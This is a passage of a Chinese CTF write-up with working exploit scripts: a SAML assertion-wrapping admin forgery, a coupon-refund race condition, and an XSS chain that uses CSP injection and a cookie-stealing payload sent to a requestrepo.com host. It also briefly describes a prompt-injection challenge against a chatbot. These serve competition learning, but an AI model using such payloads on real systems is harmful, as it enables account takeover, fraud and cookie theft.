get_csrf_from_html(reg_html) if not csrf: return f"{base} no csrf" , None email = f"exp_{int (time.time())} _{random.randint(1000 ,9999 )} @example.com" curl_post_form(f"{base} /api/register" , { "csrf_token" : csrf, "username" : "ctfuser" , "email" : email, "password" : "pw12345" , "confirm_password" : "pw12345" }, cookie) with open (IMG_PATH, "rb" ) as f: img_bytes = f.read() boundary, body = build_multipart_body(img_bytes, field_name="photos[]" , filename="x.png" , forced_ct="-1" ) body_path = tempfile.mktemp(prefix="photographer_body_" , suffix=".bin" ) with open (body_path, "wb" ) as bf: bf.write(body) up_json = curl_post_multipart(f"{base} /api/photos/upload" , boundary, body_path, cookie) try : up = json.loads(up_json) pid = up["photos" ][0 ]["id" ] except Exception: return f"{base} upload parse failed" , None settings_html = curl_get(f"{base} /settings" , cookie) csrf2 = get_csrf_from_html(settings_html) if not csrf2: return f"{base} settings csrf missing" , None curl_post_form(f"{base} /api/user/background" , { "photo_id" : pid, "csrf_token" : csrf2 }, cookie) flag = curl_get(f"{base} /superadmin.php" , cookie) return "ok" , flag.strip() def main (): bases = sys.argv[1 :] or BASES_DEFAULT results = [] for base in bases: try : status, flag = exploit_base(base) results.append((base, status, flag)) except Exception as e: results.append((base, "error" , str (e))) for base, status, flag in results: print (f"{base} -> {status} -> {flag or '<no output>' } " ) if __name__ == "__main__" : main()
auth
authController.register 只在 parseInt(type) === 0 时才检查邀请码,因此我用 type=0x10 绕过了这一校验(见 idp-portal/src/controllers/authController.js (line 27))并完成了注册,但用户实际存储的 type 依然不为 0,所以 SAML 入口仍拒绝(samlController.idpInitiatedSSO/sso 均在 idp-portal/src/controllers/samlController.js (line 13) 和 (line 176) 处要求 req.session.userType === 0)。
SP/admin 只检查会话中的 email 是否等于 admin@rois.team (sp-flag/app.py (line 88)),而自身的 SAML 验证足够严格;于是我写了 saml_exploit.py (line 1),自动注册、登录、触发 IDP 发回的 SAMLResponse,串联两份 Assertion 并把其中一个的 NameID 改成 admin 后再提交给 SP,成功绕过了权限并拿到了管理员页。
脚本附上
"""Forge an admin SAML login by wrapping a legitimately signed response.

Flow: register a throw-away user on the IdP, log in, fetch the signed
SAMLResponse the IdP issues for the "Flag" service, prepend an unsigned copy
of its assertion whose NameID is rewritten to the admin address, and post the
result to the service provider's ACS endpoint.
"""
import base64
import html
import http.cookiejar
import random
import re
import string
import sys
import urllib.parse
import urllib.request

IDP_BASE = "http://auth.rctf.rois.team"
SP_BASE = "http://auth-flag.rctf.rois.team:26000"

# Seconds to wait on every HTTP request.
TIMEOUT = 10

# Matches a literal "RCTF{...}" flag.  The braces are escaped once; the
# previous pattern escaped the backslash instead and so never matched.
FLAG_RE = re.compile(r"RCTF\{[^}]+\}")


def make_opener():
    """Return a urllib opener with its own cookie jar and a fixed User-Agent."""
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    opener.addheaders = [("User-Agent", "Mozilla/5.0 (saml-exploit)")]
    return opener


def random_string(length=8):
    """Return ``length`` random lowercase ASCII letters."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def _fetch(opener, url, fields=None):
    """GET ``url`` (or POST ``fields`` as a form) and return (status, final_url, body).

    The response is closed before returning so connections are not leaked.
    """
    data = urllib.parse.urlencode(fields).encode() if fields is not None else None
    with opener.open(url, data=data, timeout=TIMEOUT) as resp:
        body = resp.read().decode("utf-8", errors="ignore")
        return resp.getcode(), resp.geturl(), body


def register_invited_user(opener, username, email, password):
    """Submit the IdP registration form; return False if the page shows an error."""
    status, final_url, body = _fetch(
        opener,
        f"{IDP_BASE}/register",
        {
            "type": "0x10",
            "invitationCode": "",
            "username": username,
            "email": email,
            "password": password,
            "confirmPassword": password,
            "displayName": username,
            "department": "IT",
        },
    )
    print("[+] Register status:", status, "URL:", final_url)
    if "User Registration" in body and "alert-error" in body:
        print("[!] Registration appears to have failed")
        print(body[:300])
        return False
    return True


def login(opener, username, password):
    """Log in to the IdP; return False if the page reports bad credentials."""
    status, final_url, body = _fetch(
        opener,
        f"{IDP_BASE}/login",
        {"username": username, "password": password},
    )
    print("[+] Login status:", status, "URL:", final_url)
    if "Invalid username or password" in body:
        print("[!] Login failed")
        return False
    return True


def get_legit_saml_response(opener):
    """Trigger IdP-initiated SSO and return the base64 SAMLResponse, or None."""
    status, final_url, page = _fetch(opener, f"{IDP_BASE}/saml/idp/Flag")
    print("[+] IdP-initiated SSO status:", status, "URL:", final_url)
    if "Access Denied" in page or "do not have permission" in page:
        print("[!] No permission to access SAML service")
        print(page[:300])
        return None
    m = re.search(r'name="SAMLResponse"\s+value="([^"]+)"', page)
    if not m:
        print("[!] Could not find SAMLResponse in HTML. Snippet:")
        print(page[:500])
        return None
    # The value sits inside an HTML attribute, so characters such as "+" may
    # be entity-encoded; unescaping is a no-op for plain base64.
    saml_response = html.unescape(m.group(1))
    print("[+] Extracted SAMLResponse length:", len(saml_response))
    return saml_response


def build_malicious_saml_response(orig_b64):
    """Return a base64 SAMLResponse with a forged admin assertion prepended.

    The first ``<saml:Assertion>`` of the decoded response is copied, its
    ``<ds:Signature>`` element and first ``ID`` attribute are stripped, and its
    NameID is replaced with ``admin@rois.team``.  The copy is inserted directly
    before the untouched original assertion.  Returns None when the input
    cannot be decoded or contains no complete assertion.
    """
    try:
        xml = base64.b64decode(orig_b64).decode("utf-8", errors="ignore")
    except ValueError as e:  # binascii.Error is a ValueError subclass
        print("[!] Failed to decode original SAMLResponse:", e)
        return None

    start = xml.find("<saml:Assertion")
    if start == -1:
        print("[!] No <saml:Assertion> found in SAML response")
        return None
    closing = "</saml:Assertion>"
    end = xml.find(closing, start)
    if end == -1:
        print("[!] Unterminated <saml:Assertion>")
        return None
    end += len(closing)

    assertion_xml = xml[start:end]
    assertion_no_sig = re.sub(
        r"<ds:Signature.*?</ds:Signature>",
        "",
        assertion_xml,
        flags=re.S,
    )
    assertion_admin = re.sub(
        r"(<saml:NameID[^>]*>)(.*?)(</saml:NameID>)",
        r"\1admin@rois.team\3",
        assertion_no_sig,
        count=1,
        flags=re.S,
    )
    # Drop the copy's ID so it does not collide with the signed original.
    assertion_admin = re.sub(r'\sID="[^"]+"', "", assertion_admin, count=1)

    # Forged assertion first, then the whole original (still signed) assertion.
    manipulated_xml = xml[:start] + assertion_admin + xml[start:]
    return base64.b64encode(manipulated_xml.encode("utf-8")).decode("ascii")


def send_to_sp(saml_response_b64):
    """Post the SAMLResponse to the SP's ACS endpoint and print any flag found.

    Returns the flag string, or None when the response body contains none.
    """
    opener_sp = make_opener()
    _, final_url, body = _fetch(
        opener_sp,
        f"{SP_BASE}/saml/acs",
        {"SAMLResponse": saml_response_b64},
    )
    print("[+] Final URL after ACS:", final_url)
    print("[+] Response body (first 500 chars):")
    print(body[:500])
    m_flag = FLAG_RE.search(body)
    if m_flag:
        print("[+] FLAG:", m_flag.group(0))
        return m_flag.group(0)
    print("[!] FLAG pattern not found in response")
    return None


def main():
    """Run the full chain; return a process exit code (0 on completion)."""
    username = "evil_" + random_string()
    email = f"{username}@example.com"
    password = "Password123!"
    print("[*] Using username:", username)

    opener = make_opener()
    if not register_invited_user(opener, username, email, password):
        return 1

    # Fresh cookie jar for the login, as in the original flow.
    opener = make_opener()
    if not login(opener, username, password):
        return 1

    legit_b64 = get_legit_saml_response(opener)
    if not legit_b64:
        return 1

    evil_b64 = build_malicious_saml_response(legit_b64)
    if not evil_b64:
        return 1
    print("[+] Built malicious SAMLResponse, length:", len(evil_b64))

    send_to_sp(evil_b64)
    return 0


if __name__ == "__main__":
    sys.exit(main())
UltimateFreeloader 把附件给的 jar 包反编译一下,分析一下源码可以看到这是一个基于 Spring Boot 的电商购物系统后端应用,然后有很多的功能模块,/api/flag/get 接口用于返回flag,但是有很多限制:
用户已认证(有效的JWT token)
购买并完成(状态为 COMPLETED)以下4个商品:
Little Potato(小土豆)- 5.50
Sweet Potato(地瓜)- 8.80
Fish Fish(鱼)- 4.20
Large Potato(大土豆)- 10.00
用户余额必须等于 10.00(不能低于10)
用户必须有一个未使用的优惠券
如果我们注册一个用户,我们的初始余额是10元,然后默认有一个 10.00 的优惠券,分析整个题目,从揣摩出题人的角度可以看出来,这个题的目标应该是想让我们零元购商品,毕竟最后的要求是我们的余额还是10,所以肯定不是想找个什么办法刷钱啥的,而是要求我们在保留优惠券的情况下零元购所有商品
再看代码可以发现项目里有一个redis锁,创建订单的时候有一个锁防止我们同时创建多个订单,退款的时候有一个锁防止我们重复退款。用户其实一共就只能进行两个操作,一个是创建订单(可以选择使用优惠券),另一个是退款,既然没法在创建订单时并发做竞争,也没法在退款时并发做竞争,唯一可行的方法就是在创建订单和退款之间并发做竞争了。
想要在退款和创建订单之间做竞争,前提肯定是现在我们有一个购买成功的订单,有了这个订单之后我们才能退款,然后再想办法再创建订单,因为用户的钱是有限的,只有10元,要是不使用优惠券比如买了 Large Potato 之后就没钱买其他东西了,所以退款订单和创建订单二者之间必然有一个订单是通过优惠券创建的。
这里再思考这两个订单是哪个订单是用优惠券创建的,假设创建订单用优惠券创建,退款订单是直接花钱买的,即使我们竞争成功实现零元购也没意义,用优惠券创建订单本来就不用花钱,而且优惠券也没了,所以唯一的可能就是退款订单是用优惠券创建的,创建订单是直接花钱买的,说不定还有奇迹发生,能通过某种神奇的方式利用竞争免费创建订单。
先头脑风暴一下大概的思路,然后仔细分析一下这一块的代码,先看到创建订单这里,过程大概就是先对购买操作上锁,然后校验用户和商品,接着计算价格,如果优惠券金额大于商品价格,最终价格会被置为 0,最后检查余额是否能支付这个最终价格。
代码这里看起来没什么问题,后面就是数据库这边的操作了,会先用this.orderMapper.insert(order): 在订单表 orders 中插入一条新的订单记录,接着用 BigDecimal newBalance = user.getBalance().subtract(finalPrice);计算一个新余额,最后用this.userService.updateBalance(userId, newBalance)把新余额写入用户的账户,这里的逻辑其实就非常的奇怪了,正常的代码逻辑应该是对数据库里的余额做加减,这里却是算出一个新余额后替换数据库里的余额,并且还没上锁,一看就很可疑的样子。
然后再看到退款这边的逻辑,可以看到差不多,先用加法算一下当前的余额加上退款后的值得到一个新余额,然后用this.userService.updateBalance把用户的余额替换成新余额的值。
所以之前的思路确实是没问题的,就是要在退款订单和创建订单之间并发做竞争。假设退款订单的步骤是:1. 检查订单是否合法(并读取当前余额);2. 将余额替换成 10(假设退款后的余额应该是 10)。创建订单的步骤是:3. 检查订单是否合法;4. 将余额替换成 0(假设购买后的余额应该是 0)。只要竞争到 1→3→4→2 这样的执行顺序,就能在完成创建订单的所有操作之后才执行到退款订单的操作 2,把余额重新替换成 10,这样就成功实现零元购了。
因此思路就是在退款订单(用券)和创建订单(不用券)之间一直并发做条件竞争,直到竞争到某个创建订单是零元购才停,否则一直竞争,最后把四个商品全部零元购,这样就能在不花钱或者优惠券的情况下完成所有订单的购买
"""Race order creation against a coupon refund to buy every product for free.

For each target product a coupon-paid "base" order is created, then a refund
of that order and a cash purchase of the target are fired concurrently.  When
the refund writes its balance last, the cash purchase is kept while the
balance is back at 10.00 and the coupon is unused again.
"""
import random
import string
import threading
import time
from decimal import Decimal

import requests

BASE_URL = "http://127.0.0.1:8086"
TARGET_PRODUCTS = ["Little Potato", "Sweet Potato", "Fish Fish", "Large Potato"]
BASE_PRODUCT_NAME = "Little Potato"

# Balance a fresh account starts with and must end with.
FULL_BALANCE = Decimal("10.00")
# Below this balance the attempt gives up on the current user.
MIN_USABLE_BALANCE = Decimal("4.20")

SESSION = requests.Session()


def api_request(method, path, token=None, **kwargs):
    """Send one API request (up to 3 tries) and return the decoded JSON dict.

    A non-JSON reply becomes ``{"code": <http status>, "raw": <text>}``; if
    every try raises, ``{"code": -1, "error": "request failed"}`` is returned.
    """
    url = BASE_URL + path
    # Copy so a caller-supplied headers dict is never mutated.
    headers = dict(kwargs.pop("headers", None) or {})
    if token:
        headers["Authorization"] = f"Bearer {token}"
    if "json" in kwargs and "Content-Type" not in headers:
        headers["Content-Type"] = "application/json"
    for _ in range(3):
        try:
            resp = SESSION.request(method, url, headers=headers, timeout=5, **kwargs)
        except requests.RequestException:
            time.sleep(0.2)
            continue
        try:
            return resp.json()
        except ValueError:
            return {"code": resp.status_code, "raw": resp.text}
    return {"code": -1, "error": "request failed"}


def _succeeded(resp):
    """True when ``resp`` has code 200 and a truthy ``data.success``."""
    # ``data`` may be JSON null, so do not rely on the .get() default.
    return resp.get("code") == 200 and bool((resp.get("data") or {}).get("success"))


def _data_or_raise(resp):
    """Return ``resp["data"]`` or raise RuntimeError when the code is not 200."""
    if resp.get("code") != 200:
        raise RuntimeError(f"unexpected API response: {resp}")
    return resp["data"]


def random_username():
    """Return "ctf" followed by 8 random lowercase letters/digits."""
    return "ctf" + "".join(random.choices(string.ascii_lowercase + string.digits, k=8))


def register_user():
    """Register random users until one succeeds; return (user_id, token)."""
    while True:
        username = random_username()
        email = f"{username}@example.com"
        body = {"username": username, "password": "Pass1234", "email": email}
        data = api_request("POST", "/api/user/register", json=body)
        if _succeeded(data):
            d = data["data"]
            print(f"[+] Registered user {username}")
            return d["user"]["id"], d["token"]
        print("[-] register failed:", data)
        time.sleep(0.5)


def get_products(token):
    """Return a ``{product name: product id}`` mapping."""
    products = _data_or_raise(api_request("GET", "/api/product/list", token=token))
    return {p["name"]: p["id"] for p in products}


def get_coupon_info(token):
    """Return the user's first coupon; raise RuntimeError if there is none."""
    coupons = _data_or_raise(api_request("GET", "/api/coupon/my", token=token))
    if not coupons:
        raise RuntimeError("user has no coupon")
    return coupons[0]


def get_user_balance(token):
    """Return the user's balance as a Decimal."""
    info = _data_or_raise(api_request("GET", "/api/user/info", token=token))
    return Decimal(str(info["balance"]))


def get_orders(token):
    """Return the user's order list."""
    return _data_or_raise(api_request("GET", "/api/order/my", token=token))


def create_order(token, product_id, quantity="1", coupon_id=None):
    """Create an order, optionally paying with ``coupon_id``; return the raw reply."""
    body = {
        "productId": product_id,
        "quantity": quantity,
        "couponId": coupon_id,
    }
    return api_request("POST", "/api/order/create", token=token, json=body)


def refund_order(token, order_id):
    """Request a refund for ``order_id``; return the raw reply."""
    return api_request("POST", f"/api/order/refund/{order_id}", token=token)


def ensure_coupon_unused(token, coupon_id):
    """Refund the COMPLETED order holding the coupon, if the coupon is used.

    Raises RuntimeError when the coupon is still marked used afterwards.
    """
    if not get_coupon_info(token)["isUsed"]:
        return
    for o in get_orders(token):
        if o.get("couponId") == coupon_id and o["status"] == "COMPLETED":
            print(f"    [*] Restoring coupon by refunding order {o['id']}")
            refund_order(token, o["id"])
            break
    if get_coupon_info(token)["isUsed"]:
        raise RuntimeError("coupon could not be restored")


def zero_cost_purchase(token, product_ids, coupon_id, target_name, max_tries=30):
    """Try up to ``max_tries`` times to get ``target_name`` COMPLETED for free.

    Returns True once the balance is 10.00 and a COMPLETED order for the
    target exists that is not the coupon-paid base order; returns False when
    the balance drops too low or the tries run out.
    """
    target_pid = product_ids[target_name]
    base_pid = product_ids[BASE_PRODUCT_NAME]

    for attempt in range(1, max_tries + 1):
        print(f"  [*] {target_name} try #{attempt}")
        ensure_coupon_unused(token, coupon_id)

        base_resp = create_order(token, base_pid, quantity="1", coupon_id=coupon_id)
        if not _succeeded(base_resp):
            print("    [-] base order failed:", base_resp)
            time.sleep(0.2)
            continue
        base_order_id = base_resp["data"]["order"]["id"]

        results = {}

        def t_create():
            results["create"] = create_order(
                token, target_pid, quantity="1", coupon_id=None
            )

        def t_refund():
            results["refund"] = refund_order(token, base_order_id)

        threads = [threading.Thread(target=t_create), threading.Thread(target=t_refund)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

        balance = get_user_balance(token)
        create_result = results.get("create", {})
        target_order_id = None
        if _succeeded(create_result):
            target_order_id = create_result["data"]["order"]["id"]

        # Exclude the base order: when the target is the base product, an
        # un-refunded base order would otherwise look like a free purchase.
        has_target_completed = any(
            o["productId"] == target_pid
            and o["status"] == "COMPLETED"
            and o["id"] != base_order_id
            for o in get_orders(token)
        )
        print(f"    [*] balance={balance}, target_completed={has_target_completed}")
        if balance == FULL_BALANCE and has_target_completed:
            print(f"    [+] Got free COMPLETED order for {target_name}")
            return True

        if target_order_id:
            # The purchase was paid for; undo it before trying again.
            print(f"    [*] refund target order {target_order_id} to restore balance")
            refund_order(token, target_order_id)
            balance_after = get_user_balance(token)
            print(f"    [*] balance after refund={balance_after}")
            if balance_after < MIN_USABLE_BALANCE:
                print("    [-] balance too low after refund, give up this user")
                return False
        elif balance < MIN_USABLE_BALANCE:
            print("    [-] balance too low, give up this user")
            return False
        time.sleep(0.2)

    print(f"  [-] Max tries reached for {target_name}, give up on this user.")
    return False


def conditions_satisfied(token, product_ids, coupon_id):
    """Return (has_all_products, has_balance_10, has_unused_coupon, orders).

    Only the products in TARGET_PRODUCTS are required; other products the
    shop may list are ignored.  ``coupon_id`` is accepted for interface
    compatibility and not used.
    """
    orders = get_orders(token)
    balance = get_user_balance(token)
    coupon = get_coupon_info(token)
    completed_pids = {o["productId"] for o in orders if o["status"] == "COMPLETED"}
    has_all_products = all(
        name in product_ids and product_ids[name] in completed_pids
        for name in TARGET_PRODUCTS
    )
    has_balance_10 = balance == FULL_BALANCE
    has_unused_coupon = not coupon["isUsed"]
    return has_all_products, has_balance_10, has_unused_coupon, orders


def get_flag(token):
    """Call /api/flag/get, print the reply and return it."""
    data = api_request("GET", "/api/flag/get", token=token)
    print("[+] /api/flag/get:", data)
    return data


def exploit_once():
    """Run the whole attack with one fresh user; return True if the flag was requested."""
    user_id, token = register_user()
    products = get_products(token)
    for name in TARGET_PRODUCTS:
        if name not in products:
            raise RuntimeError(f"product {name} not found")

    coupon_id = get_coupon_info(token)["id"]
    print(f"[+] User {user_id}, coupon_id={coupon_id}, balance={get_user_balance(token)}")

    for name in TARGET_PRODUCTS:
        if not zero_cost_purchase(token, products, coupon_id, name):
            return False

    has_all, has_bal10, has_unused, _ = conditions_satisfied(token, products, coupon_id)
    print(
        f"[+] Final check: products={has_all}, balance10={has_bal10}, "
        f"coupon_unused={has_unused}"
    )
    if has_all and has_bal10 and has_unused:
        print("[+] Conditions satisfied, requesting flag...")
        get_flag(token)
        return True
    return False


if __name__ == "__main__":
    for attempt in range(1, 6):
        print(f"===== Attempt {attempt} =====")
        try:
            if exploit_once():
                break
        except Exception as e:  # top-level boundary: report and retry with a new user
            print(f"[!] Error in attempt {attempt}: {e}")
        time.sleep(0.5)
因为是条件竞争,所以能不能打出来有点看脸,实在不行就刷新靶机多试几次。
author 1 2 3 augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled. xss-shield.js:3 blocked! xss-shield.js:517 XSS Shield activated
我们首先要找到绕过xss-shield.js的方法,先寻找一个其他的可控点
查看php源代码发现 htmlspecialchars() 默认不编码单引号
发现属性注入利用点
1 <meta name ="author" content =<?php echo $pageAuthor ; ?> >
可以利用这一点进行任意跳转
1 <meta name ="author" content ="0;url=" http-equiv ="refresh" >
使用恶意用户名插入CSP策略阻止wafjs加载
1 'script-src-elem http://localhost:8081/assets/js/article.js;script-src unsafe-inline' http-equiv='Content-Security-Policy'
bot侧需改为
1 2 3 4 5 http://blog-app augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled. 5278586407747584:1 Refused to load the script 'http://localhost:8081/assets/js/purify.min.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js". 5278586407747584:1 Refused to load the script 'http://localhost:8081/assets/js/xss-shield.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js".
现在成功使用csp,阻止了xss-shield.js,和purify
1 2 3 4 5 6 7 8 <img src =x onerror ="new Image().src='http://cca6vtq5.requestrepo.com/steal?cookie='+encodeURIComponent(document.cookie);" > augmented-dom-instrumentation.js:1 DOM Invader is NOT enabled. 5281336646434816:1 Refused to load the script 'http://localhost:8081/assets/js/purify.min.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js". 5281336646434816:1 Refused to load the script 'http://localhost:8081/assets/js/xss-shield.js' because it violates the following Content Security Policy directive: "script-src-elem http://localhost:8081/assets/js/article.js". x:1 GET http://localhost:8081/article/x 404 (Not Found) 5281336646434816:1 Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src unsafe-inline unsafe-hashes". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution. Note that hashes do not apply to event handlers, style attributes and javascript: navigations unless the 'unsafe-hashes' keyword is present.
script-src 'unsafe-inline' 才是合法的形式,script-src unsafe-inline(不带引号)是不合法的;而 htmlspecialchars() 又会编码 ",单引号则已经被用来包裹属性值,所以我无法正确包裹 CSP 头。最后改用下面这种方式加载外部脚本获得 flag:
1 <iframe srcdoc='<script src="http://{url}/exp.js"></script>'></iframe>
Misc Signin 签
Speak Softly Love 网络取证题
第一问
根据视频的信息,直接在youtube里搜关键词快速定位到了这个视频,答案为8ssDGBTssUI
第二问
视频介绍里,提到了这个项目的网站
进网站可以看到有对应的项目仓库,装个svn的gui工具
访问仓库,可以看到有若干版本
在v0.9里找到soft error相关的记录,发现revision是178,所以答案是r178(gpt告诉我的格式)
第三问
在网站里可以快速定位到作者的个人官网https://mateusz.viste.fr/
在最下面可以找到
答案是https://mateusz.viste.fr/mateusz.ogg
第四问
个人主页里提到了有一个gopher空间,访问进去可以找到捐赠链接
或者直接搜关键词也能看到
Wanna Feel Love 网络取证题
第一问
题目给了个附件,里面是一封 eml 邮件
看了一下邮件内容,一眼垃圾邮件隐写 解隐写拿到
第二问
邮件里有个xm文件 ai分析一波发现要用OpenMPT打开,下个工具
说是要提取feel的信息,切到feel的波形发现明显是转01,黑为0红为1
写脚本提取
"""Turn an audio track into a bit string: one bit per fixed-length segment.

A segment whose RMS volume reaches the threshold is a 1, otherwise a 0.
"""
import numpy as np

# RMS level at or above which a segment counts as a 1 bit.
VOLUME_THRESHOLD = 0.3
# Length of one bit in seconds.
SEGMENT_SECONDS = 0.050


def rms_volume(segment):
    """Return the RMS (root-mean-square) volume of an audio segment."""
    return np.sqrt(np.mean(segment ** 2))


def bits_from_samples(audio, sr, segment_seconds=SEGMENT_SECONDS,
                      threshold=VOLUME_THRESHOLD):
    """Return the bit string encoded in ``audio`` sampled at ``sr`` Hz.

    Multi-channel input is averaged to mono over axis 1.  A trailing partial
    segment is ignored.  Raises ValueError when ``segment_seconds * sr`` is
    shorter than one sample, which would otherwise give a zero step.
    """
    audio = np.asarray(audio, dtype=float)
    if audio.ndim > 1:
        audio = audio.mean(axis=1)

    segment_samples = int(segment_seconds * sr)
    if segment_samples < 1:
        raise ValueError("segment is shorter than one sample")

    full_segments = len(audio) // segment_samples
    return "".join(
        "1" if rms_volume(audio[k * segment_samples:(k + 1) * segment_samples]) >= threshold
        else "0"
        for k in range(full_segments)
    )


def extract_volume_bits(path, segment_seconds=SEGMENT_SECONDS,
                        threshold=VOLUME_THRESHOLD):
    """Read the audio file at ``path`` and return its volume-encoded bit string."""
    # Imported here so the pure-numpy helpers work without the audio backend.
    import soundfile as sf

    audio, sr = sf.read(path)
    return bits_from_samples(audio, sr, segment_seconds, threshold)


if __name__ == "__main__":
    path = "Feel.flac"
    bitstring = extract_volume_bits(path)
    print(bitstring)
得到答案I Feel Fantastic heyheyhey
第三问 通过搜索第二问的答案可以找到这个猎奇小玩意
然后可以gpt梭哈
第四问
继续gpt梭哈,页面也可以自己搜到,不难
同时通过调查可以发现一篇关键文章 https://yitzilitt.medium.com/the-story-behind-i-feel-fantastic-tara-the-singing-android-and-john-bergeron-fc83de9e8f36 里面有我们想要的所有内容
第五问
在关键文章的评论里可以找到
答案为https://www.findagrave.com/memorial/63520325/john-louis-bergeron
Shadows of Asgard 流量分析题
第一问
跟踪第一个http流就看到了
第二问
往后分析,发现这里传了aeskey和iv还有data,说明是aes加密了数据 并且key一直没变
ai搞了个脚本来解密
"""Decrypt one captured payload with the AES key and IV sent in the same stream.

The key and IV arrive as base64-encoded JSON arrays of byte values; the
payload is hex.  Both CBC and CTR are tried because the mode is not known.
"""
import base64
import json

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad

aesKey_b64 = "WzUsMTM5LDI0NSwyMjAsMjMxLDQ2LDIzNCwxNDYsMjQ4LDIxMSwyLDIxMywyLDE2NSw5OCwxMTgsMTAzLDE2MiwzLDE1MCw0LDUzLDE3OSwxOTQsODQsMjA3LDQ1LDI0NSw4OCwxNzksMTkzLDEwMV0="
aesIV_b64 = "WzEyNCwyMzIsMjU0LDE5LDI1MCw0OSw1MCw4MywyMjksMjQ0LDI4LDIyMiw4MywzMywyMDIsNl0="
data_hex = "6781ed63ff3d0c5a8960573c821f293cf3f59d678671645d40a72c9ed3bbccd29ad40f754ef11b77b033f8338888a30080f7dfb242241bf1fae6e4cd903e3c257457846ece5bb9c190ee9fc367f728daadabfabf929e75c7db7e111a32919c0e"

# base64 -> JSON list of ints -> raw bytes.
aesKey = bytes(json.loads(base64.b64decode(aesKey_b64)))
aesIV = bytes(json.loads(base64.b64decode(aesIV_b64)))
ciphertext = bytes.fromhex(data_hex)


def try_aes_cbc(key, iv, ct):
    """Return the CBC-decrypted, unpadded text, or None if decryption fails."""
    try:
        cipher = AES.new(key, AES.MODE_CBC, iv)
        pt = cipher.decrypt(ct)
        return unpad(pt, AES.block_size).decode('utf-8', errors='replace')
    except ValueError:  # bad key/IV length, ciphertext length or padding
        return None


def try_aes_ctr(key, iv, ct):
    """Return the CTR-decrypted text using ``iv`` as the initial counter block.

    Returns None if the cipher cannot be set up.
    """
    try:
        # A full-block IV cannot be passed as ``nonce`` (no room is left for
        # the counter, so AES.new raises); use it as the whole counter block.
        cipher = AES.new(
            key,
            AES.MODE_CTR,
            nonce=b"",
            initial_value=int.from_bytes(iv, "big"),
        )
        pt = cipher.decrypt(ct)
        return pt.decode('utf-8', errors='replace')
    except ValueError:
        return None


print("=== 尝试 AES-256-CBC ===")
cbc_res = try_aes_cbc(aesKey, aesIV, ciphertext)
print(cbc_res if cbc_res else "CBC 解密失败")

print("\n=== 尝试 AES-256-CTR ===")
ctr_res = try_aes_ctr(aesKey, aesIV, ciphertext)
print(ctr_res if ctr_res else "CTR 解密失败")
解出路径
第三问
一样的解数据,根据描述藏了隐写,同一个流里发现png图片内有base数据
提出来解密就行,得到id
第四问
找数据然后解密
第五问
接着解数据
The Alchemist’s Cage ez提示注入题
进去先输个soul 创建个对象
然后就可以开始在五轮内进行注入攻击了,很简单的,随便让它爆爆就出来了,这里是让它重复上一轮回复,当出现指定关键词(这里是谎言),输出关键字符串
Asgard Fallen Down 流量分析题
Challenge 1: The First Command
干扰的流量太多,不太好找
在流207中发现类似连接成功的流量
解码看看,看到了熟悉的进程
同时我们注意到,响应包中有三个奇怪的base64字符串
解码看一下,发现第一个长度是32,第二个是16,猜测为AES的key和iv
继续往后看,在之后紧跟着的包中看到,一串神秘的base64
使用之前得到的密钥和iv可以成功解密
得到命令spawn whoami
然后在之后的
得到命令执行结果
Challenge 2: The Heartbeat
很明显之前的命令执行过程含有心跳包机制,在207流中很明显看到时间间隔是10s
Challenge 3: The Heart of Iron
继续解密即可
找到响应包解密
得到答案Intel64 Family 6 Model 191 Stepping 2, GenuineIntel
Challenge 4: Odin’s Eye
搜索关键词build:20251115可在2787流中找到本题的执行命令
发现之后有很多大块的响应包,猜测是可能图片base64后太大一次不好传输于是分段传输
正则匹配,解密
不知道为啥cbc没解出来,cbcnopadding出了
解密result
得到图片,工具是TscanPlus
vault 丢给ai分析大概知道是要用sui环境去编译然后运行程序跟靶机进行交互
去下个预编译好的程序,然后就可以跑了
关键在代码
但是不懂区块链只能让ai帮忙做,换了两轮ai,gpt和gemini都怪怪的,最后用claude梭出来了
改了客户端的vault.move 然后修改Move.toml和Solve.move拿到了flag
https://claude.ai/share/87c74de4-00d5-4ac9-bfce-a8faecb24525
/// Solver module: obtains the flag from the challenge vault in one call.
module solution::solution {
    use sui::coin::{Self, TreasuryCap};
    use sui::tx_context::TxContext;
    use challenge::vault::{Self, Vault, AirdropTracker};
    use challenge::vault_coin::VAULT_COIN;

    /// Request the airdrop, mint a proof coin with the supplied treasury
    /// cap, and pay it to `vault::buy_flag`.
    public fun solve(
        vault: &mut Vault,
        tracker: &mut AirdropTracker,
        treasury: &mut TreasuryCap<VAULT_COIN>,
        ctx: &mut TxContext
    ) {
        vault::request_airdrop(tracker, treasury, ctx);
        // The treasury cap is passed in mutably, so the coin can be minted
        // directly instead of being earned.
        let proof_coin = coin::mint(treasury, 100_000_000_000, ctx);
        vault::buy_flag(tracker, vault, proof_coin, ctx);
    }
}
Pwn only 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 from pwn import *s = lambda x : io.send(x) sa = lambda x,y : io.sendafter(x,y) sl = lambda x : io.sendline(x) sla = lambda x,y : io.sendlineafter(x,y) r = lambda x : io.recv(x) ru = lambda x : io.recvuntil(x) rl = lambda : io.recvline() itr = lambda : io.interactive() uu32 = lambda x : u32(x.ljust(4 ,b'\x00' )) uu64 = lambda x : u64(x.ljust(8 ,b'\x00' )) ls = lambda x : log.success(x) lss = lambda x : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval (x))) attack = '101.245.98.115 26100' .replace(' ' ,':' ) binary = './chal' def start (argv=[], *a, **kw ): if args.GDB:return gdb.debug(binary,gdbscript) if args.TAG:return remote(*args.TAG.split(':' ),ssl=True ) if args.REM:return 